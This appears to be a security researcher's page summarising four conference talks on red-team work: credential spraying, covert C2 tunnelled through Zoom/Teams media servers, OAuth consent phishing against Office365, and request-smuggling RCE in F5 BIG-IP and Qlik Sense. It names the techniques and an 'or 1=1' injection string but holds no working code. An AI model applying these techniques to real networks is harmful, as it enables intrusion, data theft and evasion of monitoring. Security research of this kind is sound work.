// talks
conference presentations, demos, and speaking engagements
Brutus: Modern Credential Testing
Brutus: Modern Credential Testing
Demo Labs presentation showcasing Brutus, a modern multi-protocol credential testing tool written in pure Go. The demo highlights automated identification and validation of default credentials, compromised passwords, and SSH keys across enterprise environments at scale.
key takeaways
- Multi-protocol credential testing across 24+ services in a single binary
- Embedded known-compromised SSH key testing from Rapid7 and HashiCorp Vagrant
- Private key spraying for lateral movement assessment
- Native JSON pipeline integration with fingerprintx and naabu
links
Ghost Calls: Abusing Web Conferencing for Covert Command & Control
Ghost Calls: Abusing Web Conferencing for Covert Command & Control
Red teams often struggle with interactive C2 in monitored networks. Low-and-slow channels are stealthy but insufficient for high-bandwidth tasks like SOCKS proxying, pivoting, or hidden VNC. This research solves this by using real-time collaboration protocols—specifically, whitelisted media servers from services like Zoom and Microsoft Teams—to create short-term, high-speed C2 channels that blend into normal enterprise traffic.
key takeaways
- Leverage TURN servers from Zoom/Teams to establish covert WebRTC tunnels
- Traffic appears as legitimate video conferencing on port 443, bypassing DPI and TLS inspection
- Introduced TURNt, an open-source tool for automated covert traffic routing
- Detection challenges and defensive countermeasures for security teams
coverage
Featured in BleepingComputer, Cybersecurity News, GBHackers, Black Hat Ethical Hacking, and numerous security publications covering the technique's implications for enterprise security.
OAuthSeeker: Leveraging OAuth Phishing for Initial Access
OAuthSeeker: Leveraging OAuth Phishing for Initial Access
Tool demonstration showcasing OAuthSeeker, a red team tool for performing consent-based phishing attacks using malicious OAuth applications targeting Microsoft Azure and Office365 users. The demo highlighted end-to-end attack scenarios from initial phishing to post-exploitation using embedded GraphRunner for data pillaging across OneDrive, SharePoint, Teams, and Outlook.
key takeaways
- OAuth consent phishing with verified Azure applications
- Admin control panel for credential management and token refresh
- Integrated GraphRunner for immediate post-exploitation
- OAuthAzure and OAuthPillage utilities for Azure resource impersonation
Leveraging Request Smuggling for Authentication Bypass and RCE
Leveraging Request Smuggling for Authentication Bypass and RCE
HTTP Request Smuggling (HRS) emerged in 2005 but remains underappreciated in today's security world. This presentation covers three critical HRS vulnerabilities in F5 BIG-IP and Qlik Sense Enterprise that led to widespread unauthenticated remote code execution, impacting roughly ten percent of the global Fortune 500 with Internet-exposed instances.
"Just like when you see a login screen you might think to try 'or 1=1' to exploit SQLi, when you see two different parts of an application processing HTTP requests, each responsible for different parts of the security model, think 'HTTP request smuggling'."
key takeaways
- CVE-2023-41265 (ZeroQlik): HTTP tunneling vulnerability in Qlik Sense - CVSS 9.9
- CVE-2023-48365 (DoubleQlik): Patch bypass for ZeroQlik - CVSS 9.9
- CVE-2023-46747 (Refresh): F5 BIG-IP request smuggling vulnerability